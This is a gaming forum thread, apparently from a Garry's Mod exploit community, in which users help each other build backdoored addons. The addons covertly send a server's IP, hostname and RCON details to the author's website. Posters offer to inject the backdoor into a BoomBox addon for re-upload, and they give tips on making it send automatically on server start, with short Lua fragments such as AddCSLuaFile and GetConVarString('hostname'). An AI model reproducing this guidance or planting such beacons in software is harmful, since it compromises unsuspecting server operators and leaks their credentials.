Hi, i have made a backdoor add on, and it works great! The only thing is i don't know what server is using that add on. I have a website, but i don't know how to send the the IP, and Server name, and RCON (If possible) to my website directory. can someone please share their backdoor php file, cl_init.lua and init.lua serverside script you use. Thank you (or just type the codes, with directions in comments XD )
Hey, i have tried that a couple times, and tested it on my steamcmd server, but nothing ever shows up in the server_list.txt on my website directory... please help
Originally Posted by clarkman28
Hey, i have tried that a couple times, and tested it on my steamcmd server, but nothing ever shows up in the server_list.txt on my website directory... please help
You need to create the file server_list.txt first before it puts data in there, + It'll only work once people start using your addon!
Originally Posted by suchisgood
You need to create the file server_list.txt first before it puts data in there, + It'll only work once people start using your addon!
Do you have skype?
Originally Posted by clarkman28
Do you have skype?
Nah, If you did what i said it would work, Unless your getting lua errors!
use a module and just have it do an http request when required
hmm
[ERROR] lua/saundersexploit.lua:7: attempt to call field 'AddNetworkString' (a nil value)
Originally Posted by bullsquid
hmm
[ERROR] lua/saundersexploit.lua:7: attempt to call field 'AddNetworkString' (a nil value)
That's because you're putting it on the client not server..
AddNetworkString = server/lua.lua only
if it says client client/bd.lua
on the top of the lua.lua put
AddCSLuaFile("autorun/client/bd.lua")
Originally Posted by suchisgood
That's because you're putting it on the client not server..
AddNetworkString = server/lua.lua only
if it says client client/bd.lua
on the top of the lua.lua put
AddCSLuaFile("autorun/client/bd.lua")
I had to edit your method a little bit but I got it to work fine. Thanks a lot man!
Originally Posted by ShitFucks
I had to edit your method a little bit but I got it to work fine. Thanks a lot man!
Np your welcome!
Originally Posted by suchisgood
Np your welcome!
If i give you an addon that im using, can you install the backdoor in it??? I cant get the server info to send to me!
Originally Posted by clarkman28
If i give you an addon that im using, can you install the backdoor in it??? I cant get the server info to send to me!
Yeah sure, Just post what you're lua codens doing in this thread and quote me!
Originally Posted by suchisgood
Yeah sure, Just post what you're lua codens doing in this thread and quote me!
here is the link to the addon, just re upload with the backdoor included... also put the index.php in the main addon directory!
https://ww w .******* . com/s /nw yxvb 51893 ow27/Boom Box%203.19.15.zip?dl=0
- - - Updated - - -
here you go https://w ww. d r opb o x .c o m/s/nwyxvb51893ow27/BoomBox%203.19.15.zip?dl=0
Originally Posted by clarkman28
here is the link to the addon, just re upload with the backdoor included... also put the index.php in the main addon directory!
-snip-
- - - Updated - - -
here you go -snip-
Okay Remove the link and take off the concommand around the api, So it auto sends also place it in the server side file in init.lua and then get the server name using
GetConVarString('hostname') or game.GetIP() on google!